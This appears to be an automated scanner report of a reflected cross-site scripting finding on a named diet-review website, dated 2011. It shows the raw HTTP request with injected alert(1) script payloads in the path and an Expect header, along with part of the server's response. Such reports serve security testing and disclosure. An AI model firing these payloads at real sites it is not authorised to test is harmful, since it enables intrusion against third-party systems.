1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://www.dietsinreview |
Path: | /favicon.ico |
GET /favicon.ico51ecf'-alert(1)- User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3 Host: www.dietsinreview.com Accept: */* Proxy-Connection: Keep-Alive Expect: <script>alert(1)</script> |
HTTP/1.1 404 Not Found Server: nginx/0.7.67 Date: Fri, 01 Apr 2011 02:13:02 GMT Content-Type: text/html Connection: keep-alive Vary: Accept-Encoding X-Powered-By: PHP/5.3.3-1ubuntu9.3 Set-Cookie: DIR=ipfndhv368ep4mou P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Vary: Accept-Encoding Content-Length: 17591 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org xmlns:og="http://ogp.me xml ...[SNIP]... <script> COMSCORE.beacon({ c1: 2, c2 : '6035818', c3 : '' , c4 : 'http://www.dietsinreview c5 : '' , c6 : '' , c15: '' }); </script> ...[SNIP]... |